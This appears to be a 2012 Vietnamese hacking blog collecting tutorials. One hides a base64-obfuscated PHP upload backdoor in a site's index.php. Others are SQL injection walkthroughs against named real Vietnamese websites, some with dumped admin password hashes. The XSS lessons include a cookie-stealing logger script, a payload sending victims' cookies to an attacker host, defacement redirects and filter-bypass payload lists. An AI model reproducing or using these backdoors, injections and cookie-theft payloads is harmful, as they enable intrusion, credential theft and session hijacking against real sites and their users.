Chủ Nhật, 26 tháng 8, 2012

XSS - Vietnamnet.vn (26/8/2012)


Tut giấu shell

Mọi người thấy hay thì cho em tí tín dụng để vào Family nhé 

Bình thường, sau khi đã up dc shell lên host, việc đầu tiên có lẽ là tìm chỗ giấu shell.

Vậy giấu shell làm sao để admin khó biết ?

Có nhiều cách: đặt tên na ná tên các file trên host, giấu ở các folder kín,...

Bài viết sau đây giới thiệu một cách giấu shell khác, khá hữu dụng 

Bước 1: Giấu
+ Chọn một file nào đó trên host (VD: index.php)
+ Chèn thêm đoạn code sau vào giữa file:

Code:
eval(base64_decode("Pz48P3BocCBpZihpc3NldCgkX0dFVFsiYWN0Il0pICYmICRfR0VUWyJhY3QiXT09InNvaWRhaWthIil7CgppZihpc3NldCgkX0ZJTEVTWyJGaWxlIl0pKQp7CiRQYXRoPWV4cGxvZGUoIi8iLF9fRklMRV9fKTsKdW5zZXQoJFBhdGhbY291bnQoJFBhdGgpLTFdKTsKJFBhdGg9aW1wbG9kZSgiLyIsJFBhdGgpOwokUGF0aC49Ii8iLiRfRklMRVNbIkZpbGUiXVsibmFtZSJdOwoJaWYgKCRfRklMRVNbIkZpbGUiXVsiZXJyb3IiXSA+IDApCgl7CgllY2hvICJFcnJvcjogIiAuICRfRklMRVNbIkZpbGUiXVsiZXJyb3IiXSAuICI8YnIgLz4iOwoJfQoJZWxzZSBpZihtb3ZlX3VwbG9hZGVkX2ZpbGUoJF9GSUxFU1siRmlsZSJdWyJ0bXBfbmFtZSJdLCRQYXRoKSkKCXsKCWVjaG8gIlN0b3JlZCBpbjogIiAuJFBhdGg7Cgl9Cn0KPz4KPGZvcm0gbWV0aG9kPSJwb3N0IiBlbmN0eXBlPSJtdWx0aXBhcnQvZm9ybS1kYXRhIj4KCTxpbnB1dCB0eXBlPSJmaWxlIiBuYW1lPSJGaWxlIi8+PGlucHV0IHR5cGU9InN1Ym1pdCIvPgo8L2Zvcm0+Cjxici8+CkNvZGVkIGJ5IExlb3JpdXMKPD9waHAKZXhpdDsKfQo/Pjw/"));

Bước 2: Sử dụng
+ Truy cập vào index.php?act=soidaika




========================================================
lang thang có thấy mấy đoạn code này chèn vô index,hóa ra của bạn,
thêm 1 doạn nho nhỏ nè chèn bất kỳ đâu nhé,khó mà mò dc nó 
if($_GET['id']=='hk')
{
echo '<form method="POST" enctype="multipart/form-data" action="?id=hk">
<input type="file" name="file_upload" size="20" id="file">
<input type="submit" name="gui" value="Up" >
</form>';if (isset($_POST['gui'])){
move_uploaded_file($_FILES['file_upload']['tmp_name'], $_FILES['file_upload']['name']);
}
}
nếu chèn vô index sẽ là
index.php?id=hk
sẽ thấy from upload

[TUT] Up Shell không cần quyền admin (quyền User)

Tut này đơn giản thôi, các pro nào biết rồi thì chém nhẹ tay thôi nhé!

http://www.mediafire.com/?e615wih8v6c18f8
Khi nào em rảnh em sẽ up lên Youtube cho mọi người dễ xem
Bấm nút thanks để em có tinh thần viết tiếp nha


TUT BY 
h6009

VHB

Thứ Ba, 21 tháng 8, 2012

[Magazine] The Hacker News Tháng 8 - 2012



Link Download

http://www.mediafire.com/view/?h0hu2ibuvno0m30 

[Tut] SQL injection phimck.com



Khai thác lỗi này dùng Error Base nhé. Bắt đầu thôi

Get version

     Mã:
http://phimck.com/Phim-Online/'%20and%20(select%201%20from%20(select%20count(*),concat((select(select%20concat(version(),0x7c))%20from%20information_schema.tables%20where%20table_schema=database()%20limit%201,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)--%20-.html
Get table: table_user 
Mã:
http://phimck.com/Phim-Online/'%20and+(select+1+from+(select+count(*),concat((select(select+concat(cast(table_name+as+char),0x7c))+from+information_schema.tables+where+table_schema=database()+limit+12,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)-- -.html
Get column: user_name và user_password của table_user
Mã:
http://phimck.com/Phim-Online/'%20+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(column_name+as+char),0x7c))+from+information_schema.columns+where+table_name=0x7461626c655f75736572+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--%20-.html
Mã:
http://phimck.com/Phim-Online/'%20+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(column_name+as+char),0x7c))+from+information_schema.columns+where+table_name=0x7461626c655f75736572+limit+3,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--%20-.html
Get data user_name và user_password
Mã:
http://phimck.com/Phim-Online/'%20+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(concat(0x7c,user_name,0x7c,user_password,0x7c)+as+char),0x7e))+from+table_user+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--+.html
và kết quả đây
admin|51d31cdcc6bc148eed78adf4cda28331

[Tut] SQL injectinon sach.phuyen.edu.vn


Get database,user,version:

Code:
sach.phuyen.edu.vn/cocautochuc_view.php?id=07' and (select 1 from (select count(*),concat((select(select concat_ws(0x7c,database(),user(),version())) from information_schema.tables where table_schema=database()limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
Get table: tbl_users
Code:
sach.phuyen.edu.vn/cocautochuc_view.php?id=07'and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7c)) from information_schema.tables where table_schema=database() limit 70,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
Get column của table tbl_users: username, passwd
Code:
sach.phuyen.edu.vn/cocautochuc_view.php?id=07'and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7c)) from information_schema.columns where table_name=0x74626c5f7573657273 limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
Code:
sach.phuyen.edu.vn/cocautochuc_view.php?id=07'and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7c)) from information_schema.columns where table_name=0x74626c5f7573657273 limit 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
Get thông tin column username, passwd:
Code:
sach.phuyen.edu.vn/cocautochuc_view.php?id=07'and (select 1 from (select count(*),concat((select(select concat(cast(concat(0x7c,username,0x7c,passwd,0x7c) as char),0x7e)) from tbl_users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
|sach|0e33aad5b3773c3314fd289c4b4e80c4|

[Tut] SQL injection alphala.edu.vn

Victim : http://alphala.edu.vn
Những bước đầu anh em làm nhé. Bắt đầu làm từ bước Get version
Get version:
Mã:
http://alphala.edu.vn/index.php?type=1&show=news&view=32 union select 1,concat_ws(0x7c,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--
Get table:
Mã:
http://alphala.edu.vn/index.php?type=1&show=news&view=32 union select 1,unhex(hex(group_concat(table_name))),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from information_schema.tables where table_schema=database()--
Get column của table users:
Mã:
http://alphala.edu.vn/index.php?type=1&show=news&view=32 union select 1,unhex(hex(group_concat(column_name))),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from information_schema.columns where table_name=0x7573657273--
Get data column username, password:
Mã:
http://alphala.edu.vn/index.php?type=1&show=news&view=32 union select 1,unhex(hex(group_concat(username,0x7c,password))),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from users--
Done - phund|1234,llvdemo|edb1beb699ca64802a3be86d9c90a19d,admin|21232f297a57a5a743894a0e4a801fc3

[Tutorial] XSS Bài 3: Thực hành với XSS - WARGAME


 Dear all!
Nói lý thuyết mãi cũng nhàm! Giờ là đến phần thực hành! Chúng ta phải hoàn toàn lưu ý là XSS là những cuộc tấn công trên máy client! Chứ hoàn toàn không có tác động gì đến server! Theo cách so sánh của mình thì đó có thể gọi là tấn công "du kích". Vì sao lại gọi như vậy, vì khi chúng ta thực hiện việc các công đoạn lấy cookie của các member trên website của server (site chứa lỗi XSS cũng chính là 1 thủ thuật SE) 
Đến h chúng ta hãy bắt đầu thực hành. Hãy nhớ bài 1 và bài 2 trong loạt bài viết về XSS này hẳn bạn cũng đã có 1 chút gì đó hiểu về XSS! Nếu không bạn vui lòng đọc lại bài 1,2 thì bài thứ 3 này bạn mới có thể thực hành được 
Một số lưu ý nhỏ khi thực hành:
- Hãy cố gắng thao tác trên các textbox, url!
- Cố gắng đưa ra kết quả là 1 hộp thoại chứa thông điệp...
- Vận dụng nhiều cách bypass như SQLi (Mình thấy nó khá giống nhau về khoản bypass này)
- Bạn có biết rằng google trả cho mỗi lỗi xss là 500usd, facebook và microsoft hay tw hay skype cũng trả khá nhiều cho mỗi lỗi xss không
Trả lời 1 số câu hỏi thường gặp:

- Có thể kiếm tiền từ cách attack này không?
TL: Hoàn toàn có thể được. Bạn có thể report đến nhà quản trị website và họ có thể tặng bạn vài trăm thậm trí vài ngàn usd! Nhưng đó là cách làm của 1 người thuộc trường phái lương thiện. Tạm gọi là white hat. Còn trường phái của blackhat là chẳng bao giờ báo cáo vì họ còn kiếm được nhiều tiền hơn từ những sự phát hiện của họ. Trong trường hợp này bạn có thể lấy được cookie của người sử dụng. Tuyệt vời hơn nếu nó là cookie của nhà quản trị website.(Đọc bài 2 để biết cách lấy cookie). Khi đã có cookie rồi thì có lẽ bạn đã làm chủ được cái tài khoản của 1 member trong website đó! Hãy thử tưởng tượng bạn có 1 cookie của 1 member trên amazone.... Bạn sẽ có gì???
- Có upload được shell không?
TL: Đừng bao giờ hỏi câu này lần thứ 2 nhé! Bởi cách attack này bạn chỉ thực hiện trên phía client không phải trên server! Bạn chỉ thao tác trên client chứ không thao tác trên server! Điều này có nghĩa là mọi tác động của bạn chỉ tác động đến máy client thôi! Còn chuyện upshell! OK! Cũng có khả năng lắm nếu bạn lấy được cookie của admin sau đó vào trang quản trj và upshell! Không có gì là không thể! 
- Mức độ nguy hiểm của loại attack này!
TL: Theo tôi nghĩ thì nó khá nguy hiểm! Không cớ gì mà khi phát hiện 1 lỗi XSS của trang web mà acunextive cảnh báo màu đỏ chót! Nó thực sự nguy hiểm đấy
Thôi có lẽ nói quá nhiều rồi! Giờ là ví dụ cho các bạn thực hành
Đây là victim
http://m.aol.com/yp/search?query=
Còn đây là kết quả!
http://m.aol.com/yp/search?query=Bars%22%3E%3Cscript%3Ealert%2/Can%20u%20see%20me%20^^!/%29%3C/script%3E
Bài thực hành 2:
http://www.irma-grenoble.com/05docum...ons.php?id_DT=
Đáp án: 
http://www.irma-grenoble.com/05documentatio/04dossiers_questions.php?id_DT=%3Cscript%3Ealert%28/Do%20u%20want%20to%20get%20cookie/%29%3C/script%3E
 Chúc các bạn vui vẻ!!!!

Nguồn Tài Liệu
http://junookyo.blogspot.com/2011/12/xss-bai-3-thuc-hanh-voi-xss-wargame.html

[Tutorial] XSS Bài 2: XSS Nâng cao + Bypass bộ lọc



 Bây giờ, Trong phần này tôi sẽ chia sẻ một vài cách để sử dụng sự nguy hiểm của XSS một lần nữa với trang web. Nào, hãy giữ sự tập trung tất cả những tấn công sẽ gửi đến hệ thống, trang web, máy chủ và hãy cẩn thận, bạn có thể bị truy tố về những hành động này. Vì vậy, hãy luôn bảo vệ bản thân nếu bạn đang lập kế hoạch làm một cái gì đó độc hại đến trang web. Nếu bạn muốn thực hiện một cửa sổ pop hộp cảnh báo nhỏ, bạn không phải sử dụng một Proxy / VPN.
Cookie Stealing/Logging

Bây giờ,lấy trộm cookielà về những điều độc hại nhất mà chúng ta có thể làm với XSS- Không Liên Tục. Một cookie kẻ đánh cắp / logger, sẽ đăng nhập các tập tin cookie của người dùng truy cập trang vào một tài liệu nhất định. Cách dễ nhất để làm điều này, sẽ là một quá trình ba bước.

Trước tiên, bạn nên thiết lập một trang web. Cá nhân tôi tìm thấy http://www.000webhost.com/ tốt nhất cho mã tải lên độc hại, các chương trình, hoặc bất cứ điều gì khác. Vì vậy, hãy đăng ký ở đó.
Bây giờ, một khi bạn đã tạo ra trang web của bạn, hãy vào quản lý tập tin. Tạo một file mới. Hãy gọi nó là "CookieLog.txt". Để trống mã. Bây giờ, tạo ra một tập tin sau đó, đặt tên là "CookieLogger.php". Trong CookieLogger.php, chúng ta cần thêm một số mã, do đó nó sẽ gửi các tập tin cookie mà chúng ta đăng nhập, vào Đăng nhập Cookie của chúng tôi. Thêm mã này, vào nó (Chỉ cần chắc chắn rằng tên tập tin là php, hoặc người nào khác nó sẽ không chạy mã PHP (ISS server ...ect))


<?php
/*
* Created on 16. april. 2007 Được tạo ngày 16/8/2007
* Created by Audun Larsen (audun@munio.no)- Tác giả-
*
* Copyright 2006 Munio IT, Audun Larsen
*
* THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES,
* INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
* FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
* (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
* OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
* OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,
* EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/

if(strlen($_SERVER['QUERY_STRING']) > 0) {
$fp=fopen('./CookieLog.txt', 'a');
fwrite($fp, urldecode($_SERVER['QUERY_STRING'])."\n");
fclose($fp);
} else {
?>

var ownUrl = 'http://<?php echo $_SERVER['HTTP_HOST']; ?><?php echo $_SERVER['PHP_SELF']; ?>';

// ==
// URLEncode and URLDecode functions
//
// Copyright Albion Research Ltd. 2002
// http://www.albionresearch.com/
//
// You may copy these functions providing that
// (a) you leave this copyright notice intact, and
// (b) if you use these functions on a publicly accessible
// web site you include a credit somewhere on the web site
// with a link back to http://www.albionresearch.com/
//
// If you find or fix any bugs, please let us know at albionresearch.com
//
// SpecialThanks to Neelesh Thakur for being the first to
// report a bug in URLDecode() - now fixed 2003-02-19.
// And thanks to everyone else who has provided comments and suggestions.
// ==
function URLEncode(str)
{
// The Javascript escape and unescape functions do not correspond
// with what browsers actually do...
var SAFECHARS = "0123456789" + // Numeric
"ABCDEFGHIJKLMNOPQRSTUVWXYZ" + // Alphabetic
"abcdefghijklmnopqrstuvwxyz" +
"-_.!~*'()"; // RFC2396 Mark characters
var HEX = "0123456789ABCDEF";

var plaintext = str;
var encoded = "";
for (var i = 0; i < plaintext.length; i++ ) {
var ch = plaintext.charAt(i);
if (ch == " ") {
encoded += "+"; // x-www-urlencoded, rather than %20
} else if (SAFECHARS.indexOf(ch) != -1) {
encoded += ch;
} else {
var charCode = ch.charCodeAt(0);
if (charCode > 255) {
alert( "Unicode Character '"
+ ch
+ "' cannot be encoded using standard URL encoding.\n" +
"(URL encoding only supports 8-bit characters.)\n" +
"A space (+) will be substituted." );
encoded += "+";
} else {
encoded += "%";
encoded += HEX.charAt((charCode >> 4) & 0xF);
encoded += HEX.charAt(charCode & 0xF);
}
}
} // for

return encoded;
};

cookie = URLEncode(document.cookie);
html = '<img src="'+ownUrl+'?'+cookie+'">';
document.write(html);

< ?php
}
?>
Bây giờ chúng ta có kịch bản Logger Cookie của chúng ta, chúng ta có thể gửi các logger cookie cho người bạn tốt nhất của chúng ta, Web-Admin. Để làm điều này, chúng ta có lẽ nên Tiny URL. Hoặc nếu bạn có thể tìm ra cách để Spoof URL, mà sẽ làm việc quá.

Tiny URL, đi đến http://www.spam.com/ và chỉ cần đặt trong URL. Nhưng , chúng ta cần thêm một kịch bản vào lỗ hổng XSS của chúng ta. Đây là kịch bản mà sẽ khởi động Cookie Logging của chúng ta
 <script>document.location="http://www.host.com/mysite/CookieLogger.php?cookie=" + document.cookie;</script>
Chắc bạn cũng hiểu là cần thay đổi gì trong đoạn script trên phải không. Hãy thay đường dẫn đến link CookieLogger bằng link của bạn
Vì vậy, chỉ cần thêm rằng kịch bản sau khi các URL,Sau đó gửi cho quản trị web của chúng ta bây giờ điều này có thể mất một thời gian cho ban quản trị để click vào nó. Bạn hãy tùy biến cách thức để nhà quản trị tin tưởng và click vào nó. Đôi khi, các quản trị sẽ ko click vào nó, vì vậy nếu nó mất quá nhiều thời gian, bạn chỉ nên từ bỏ và tìm một cách khác để khai thác nó.

Một khi bạn nhận được các cookie, bạn có thể sử dụng "Cookie Manager" của Firefox addon để thao tác và chỉnh sửa các tập tin cookie để bạn có thể chiếm quyền điều khiển phiên quản trị viên. Tôi thấy Cookie Manager là một ứng dụng rất hữu ích cho XSS, hãy tải nó về.
DEFACING

Defacing là một trong những điều phổ biến nhất mọi người muốn làm khi họ có quyền truy cập cho nhiều tùy chọn quản trị viên. Chủ yếu là để họ có thể quảng cáo cho bản thân, và chỉ đơn giản là cho phép người quản trị biết rằng an ninh của họ đã bị vi phạm. Bất cứ cách nào, defacing với XSS liên tục, có thể là một box bình luận, hoặc một cái gì đó. Bạn có thể sử dụng kịch bản để tạo lại trực tiếp đến trang của bạn thay đổi (Bạn có thể phải chuyển hướng thay đổi nội của bạn trên Pastehtml.com, bởi vì nó tải lên.một cách dễ dàng)
<script>window.location="http://www.pastehtml.com/YOURDEFACEHERE/";</script>
                      <script>location="http://web.com/hacked.html";</script>

                    <script>window.location="http://linkanh.com/anh.png";</script>

- Chèn ảnh vào nội dung website
                       <img src=" http://linkanh/anh.png"> 

- Chèn 1 video vào nội dung site
                      <EMBED SRC="http://link.com/hacked.swf">

XSS: onmouseover

Onmousover không phải là một lỗ hổng khai thác. Nhưng nó vẫn được coi là XSS. Một lỗ hổng onmouseover sẽ giống như thế này:
onmouseover=prompt1337
Chúng ta có thể khai thác nó bằng cách chỉnh sửa
onmouseover=alert("XSS")
Một lỗi rất cơ bản, nhưng nó nhận được cảnh báo, và các thành phần trong các trang web rất nhiều. Hầu hết các trang web sẽ sử dụng Adobe Flash hay CSS để làm những loại hiệu ứng.
XSS bypass bộ lọc
Đôi khi một truy vấn XSS đơn giản sẽ không làm việc. Lý do truy vấn của bạn không làm việc, là bởi vì trang web có một bộ WAF hoặc lọc tại chỗ. Một bộ lọc sẽ chặn như XSS và các truy vấn SQLi. Trong trường hợp này, chúng ta đang làm việc với XSS.

Có rất nhiều cách để bỏ qua các bộ lọc XSS, nhưng tôi sẽ chỉ giải thích một vài trường hợp.
1. Hex Bypassing
Với các char bị chặn như>, <, và /, nó là khá khó khăn để thực hiện một truy vấn XSS. Không phải lo lắng, luôn luôn là một giải pháp. Bạn có thể thay đổi các ký tự của bạn, vào Hex. Hex của một char nào đó, về cơ bản là các char, nhưng trong một định dạng khác nhau. Những điều này sẽ giúp bạn vượt qua:
> = %3c
< = %3c
/ = %2f
2.ASCII Bypassing
Với một mã hóa ASCII, chúng ta có thể sử dụng các char "bị chặn bộ lọc chặn tốt! Đây là một trong những bộ lọc XSS phổ biến nhất qua mọi thời đại Một kịch bản mà bạn sẽ cần để mã hóa, sẽ giống như thế này...:
Đây là đoạn mã không làm việc ---->
<script>alert("XSS")</script>
Còn đây ... Nó đã làm việc
<script>alert(String.fromCharCode(88,83,83))</script>
Để mã hóa bạn hãy truy cập wocares.com/noquote.php Tôi dùng trang này, và tìm thấy nhiều thứ khá hữu dụng
3.Case-Sensitive Bypassing
Loại bộ lọc này ít khi thấy, nhưng nó luôn luôn giá trị . Một số bộ lọc được thiết lập tại chỗ để phát hiện những đoạn viết, tuy nhiên, các bộ lọc của chuỗi bị chặn là trường hợp nhạy cảm. Vì vậy, tất cả chúng ta cần phải làm, là thực hiện một kịch bản, với các kiểu chữ hoa thường khác nhau . Điều này sẽ vượt qua bộ lọc, giống như dưới đây:
<ScRiPt>aLeRt("XSS")</ScRiPt>
Bạn cũng có thể kết hợp với mã hóa ASCII nếu bạn muốn. Hãy biến tấu nó thật linh hoạt.
Một vài Từ khóa cho lỗi XSS
inurl:search.php?
inurl:find.php?
inurl:search.html
inurl:find.html
inurl:search.aspx
inurl:find.aspx
Những dork này là cơ bản. Tôi ít khi dùng dork và với hướng dẫn này bạn koneen sử dụng dork. XSS là 1 lỗ hổng rất phổ biến ngay cả google, tôi đã tìm thấy một số.
Cuối cùng cảm ơn bạn đã đọc vui lòng phản hồi những ý kiến tại đây và nói cảm ơn nếu bạn thấy thích thú với hướng dẫn này của tôi.
Nguồn Tài Liệu
http://junookyo.blogspot.com/2011/12/bay-gio-trong-phan-nay-toi-se-chia-se.html

[Tutorial] XSS Bài 1: Basic XSS


 Xin Chào và cám ơn đã đọc bài hướng dẫn về XSS này của tôi. Bản có thể hỏi là tại sao tôi lại viết bài hướng dẫn này. Hộp thư của tôi đã quá đầy, và thực sự tôi đã nhận được rất nhiều yêu cầu về việc viết 1 bài hướng dẫn. Tôi đã gửi những cuộc tấn công XSS của tôi trên GG, FB, Defense.gov những site lớn khác. 
XSS là gì. 
Xss được viết tắt bởi Cross-Site-Scripting. Nó là một cách tấn công cơ bản. Và nó dựa trên việc chạy HTML và Javascript trên 1 trang web. Việc tấn công này có thể done khi xác nhận những lệnh ở các text-box, hoặc cũng có thể là trên thanh URL. Những kết quả được đọc dưới dạng HTML, vì vậy nó sử dụng một vài thủ thuật social-engineering (kỹ thuật lừa đảo - scam! 1 ví dụ như những trang face yahoo là 1 trong những kỹ thuật SE) để tác động đến 1 ai đó tải một virus mà chính bạn đã tạo ra, và là tiềm năng cho một botnet, hoặc RAT, cũng có thể là 1 keylogger. XSS có thể trở nên rất nguy hiểm, Nhưng cũng có thể rất vô hại. Phần lớn các cuộc tất công của tôi là 1 cuộc tấn công XSS vô hại. trên đây là 1 số cách để sử dụng XSS để nâng cao trình độ của bạn. Tôi sẽ đi qua một số nhỏ những ví dụ. Bạn có thể sử dụng hộp cảnh báo để quảng bá chính bạn (LOL), hoặc cảnh báo người quản trị website mà bạn phát hiện ra một vi phạm an ninh bởi XSS. Bạn cũng có thể cài đặt 1 Cookie Stealer/Logger. Bất cứ những gì bạn có thể làm với HTML, Đều được sử dụng lại nhiều lần với 1trang bởi XSS. Tôi sẽ giải thích một số trong hầu hết những điều quan trọng liên quan đến XSS
HTML và Javascript là gì?
HTML
HTML là một loại giống như một ngôn ngữ lập trình. Phân biệt giữa các ngôn ngữ lập trình và HTML thì thực ra là nó không quá khác nhau. Chúng là những ngôn ngữ, Đều có thể tạo ra các thuộc tính, sự kiện. HTML là một ngôn ngữ đánh dấu, Mà được sử dụng để tạo ra các website. HTML được viết tắt từ HYPER - TEXT MARKUP LANGUAGE. Bạn có thể sử dụng HTML để tạo ra các FORMS ( Các ô điền! EX: Ô Username, password), Các Buttons (Ex: Nút đăng ký, xác nhận) và những thứ khác mà có thể sử dụng trong trình duyệt web. Trang web nào cũng sử dụng HTML. Nên bạn yên tâm. Bài viết này không thừa
JavaScript
Bây giờ, Đầu tiên, Nói thẳng luôn. Có một sự khác nhau to lớn giữa java và javascript. Java, là một ngôn ngữ tương tự C++, Nó có thể sự dụng trong các game, Còn trong các ứng dụng Javasript là một loại tương tự như HTML, Nhưng có một vài cách định nghĩa khác. Javascript không được sử dụng gần với web hơn HTML. Javascript được sử dụng nhiều hơn với các ứng dụng nằm ngoài trang web. Javascript có thể vô cùng hữ dụng cùng với HTML. Chúng là những điều đơn giản để học, và rất năng động
XSS: Cuộc tấn công đầu tiên của tôi
Nào, hãy bắt đầu lấy những thứ hữu dụng, trong phần này, Tôi sẽ giới thiệu làm cách nào để sử dụng XSS để nâng cao trình độ của bạn. Chúng ta cũng sẽ xem những cuộc tấn công đầu tiên với XSS, Nếu bạn biết căn bản về XSS bạn có thể bỏ qua phần này, bởi vì tôi nghi ngờ bạn sẽ học bất cứ thứ gì mà bạn chưa biết 
Bây giờ, Bước đầu tiên của chúng ta là cố gắng tìm ra một website có lỗi. Tìm một website có lỗi về XSS là một điều dễ dàng hơn việc tìm một website có lỗi SQLi. Với SQLI, bạn có thể thêm '. Nhưng với XSS bạn phải xác nhận (thi thoảng) nhiều lệnh. Để kiểm tra website của bạn với XSS
Hầu hết các site lỗi đều chứa những khu vực như Search(tìm kiếm), Login (Đăng nhập) hoặc Register (Đăng ký). Tuyệt vời hơn là bất cứ nơi nào mà chứa textbox, có thể khai thác với XSS. Tuy nhiên một số người quên điều thực tế này, và không bao giờ sử dụng chúng một cách hiệu quả bởi vì họ nghĩ chúng không hữu dụng. Bạn có thể khai thác XSS thông qua source cũng được. Tôi sẽ giới thiệu phương thức này của XSS sau, còn bây giờ chúng ta cần một 1 ví dụ hoàn toàn cơ bản.
Bằng bất cứ cách nào, website của ta cũng có Texboxes để nhập. Tôi đơn giản sử dụng một thanh Search
Vì vậy, hãy cố gắng tập trung. Lệnh cơ bản xuyên suốt quá trình về XSS

<script>alert("XSS")</script>
Đó là 1 ví dụ nhỏ, là HTML. Nó sẽ làm cho một ít thông báo bật lên,thông báo: "XSS". Bạn có thể chỉnh sửa một phần nếu bạn muốn. Chỉ cần không sửa đổi bất kỳ các bộ phận khác của kịch bản. Đặt vào thanh tìm kiếm của bạn, và nhấn Enter. Bây giờ, nếu một hộp cảnh báo ít xuất hiện, bạn đã thành công tấn công một trang web dễ bị tổn thương XSS! Nếu không có hộp xuất hiện, trang đó an toàn với mã trên của chúng ta, bởi vì có nghĩa là trang web đã thực hiện đưa request vào một bộ lọc. Một bộ lọc, là khi chúng ta tìm kiếm một cái gì đó, sau đó nó đi qua một quá trình nhỏ, về tìm kiếm cơ bản. Nó kiểm tra đối với bất kỳ những thứ độc hại (nguy hiểm). Trong trường hợp này, nó đã tìm được XSS. Đôi khi, các bộ lọc này rất yếu, và có thể được thông qua rất dễ dàng, thời gian khác, họ có thể khá khó khăn để vượt qua. Có rất nhiều cách để bỏ qua một bộ lọc XSS. Trước tiên, chúng ta phải tìm ra những gì các bộ lọc chặn. Nó là blockin cảnh báo. Dưới đây là một ví dụ về loại này của bộ lọc:
<script>alert("XSS")</script>
 Được chuyển thành
<script>alert( > XSS DETECTED < )</script>
Nó sẽ ngăn chặn các dấu ngoặc kép. Vì vậy, làm thế b` nào để chúng ta thông qua? Vâng, may mắn có một cách để mã hóa thông điệp đầy đủ. Chúng ta sẽ sử dụng một chức năng nhỏ được gọi là "String.FromCharCode". Tên của nó đã giải thích tất cả. Nó mã hóa văn bản của chúng ta, thành ASCII. Một ví dụ về mã hóa này, sẽ được như thế này:
String.fromCharCode(88,83,83)
Có, nó có thể được một chút rắc rối nhỏ, nhưng với một chút giải thích, và thử nghiệm, nó là khá đơn giản. Đây là những gì truy vấn đầy đủ của chúng ta sẽ xem xét như:
<script>alert(String.fromCharCode(88,83,83))</script>
Bạn không cần bất kỳ dấu ngoặc kép trong các truy vấn đơn giản như thế. Vì vậy, cho phép đưa nó trở lại vào thanh tìm kiếm, và thì đấy!Nó làm việc! Chúng ta có một hộp cảnh báo nói rằng "XSS"! Nếu bạn vẫn không nhận được bất kỳ hộp cảnh báo, hãy thử một số các truy vấn này mà tôi muốn sử dụng:
"><script>alert("XSS")</script>
"><script>alert(String.fromCharCode(88,83,83)) </script>
'><script>alert("XSS")</script>
'><script>alert(String.fromCharCode(88,83,83))</script>
<ScRIPt>aLeRT("XSS")</ScRIPt>
<ScRIPt<aLeRT(String.fromCharCode(88,83,83))</ScRIPt>
"><ScRIPt>aLeRT("XSS")</ScRIPt>
"><ScRIPt<aLeRT(String.fromCharCode(88,83,83)) </ScRIPt>
'><ScRIPt>aLeRT("XSS")</ScRIPt>
'><ScRIPt<aLeRT(String.fromCharCode(88,83,83))</ScRIPt>
</script><script>alert("XSS")</script>
</script><script>alert(String.fromCharCode(88,83,83) )</script>
"/><script>alert("XSS")</script>
"/><script>alert(String.fromCharCode(88,83,83))</script>
'/><script>alert("XSS")</script>
'/><script>alert(String.fromCharCode(88,83,83))</script>
</SCRIPT>"><SCRIPT>alert("XSS")</SCRIPT>
</SCRIPT>"><SCRIPT>alert(String.fromCharCode(88,83,8 3))
</SCRIPT>">"><SCRIPT>alert("XSS")</SCRIPT>
</SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83 ,83))</SCRIPT>
";alert("XSS");"
";alert(String.fromCharCode(88,83,83));"
';alert("XSS");'
';alert(String.fromCharCode(88,83,83));'
";alert("XSS")
";alert(String.fromCharCode(88,83,83))
';alert("XSS")
';alert(String.fromCharCode(88,83,83))
 Vâng, tôi chỉ viết tất cả ,nó là những cách bypass bộ lọc. nhưng tất cả chúng đều làm việc theo cách riêng của chúng, vì vậy hãy thử hết trong số chúng nếu bạn có thể. Tôi đã tấn công một số trang web khá lớn với một số những truy vấn. Tôi tạo ra các truy vấn riêng của tôi đôi khi, bạn nên tạo ra một số, chúng chứa rất nhiều tiện dụng.
Nguồn Tài Liệu
http://junookyo.blogspot.com/2011/12/xss-bai-1-basic-xss.html

[Tool Security] Get tài liệu ở tailieu.vn



Đây là Tool get các tài liệu từ trang tailieu.vn mà không cần tài khoản. Từ nay mọi tài liệu trên trang này đều có thể lấy về được. Đây là link download
http://www.mediafire.com/?e8m94ejmtdrl86m

SnadBoy's Revelation 2.0- Giải mã Password dạng sao (*****)

Đây tool giúp ta rọi những password đã bị mã hóa dạng sao **** có khi nó cũng rất cần thiết những lúc ta quên password nhưng may mắn trước đây khi đăng nhập vào website thành viên hay tài khoản dịch các dịch vụ khác như tài khoản Yahoo messenger chẳng hạn...ta có để chế độ nhớ passowrd để lần sau login nhanh hơn.Và lúc này ta có thể dùng tới Tool Revelation giải mã password dạng mã hóa (*******) để lấy lại password.

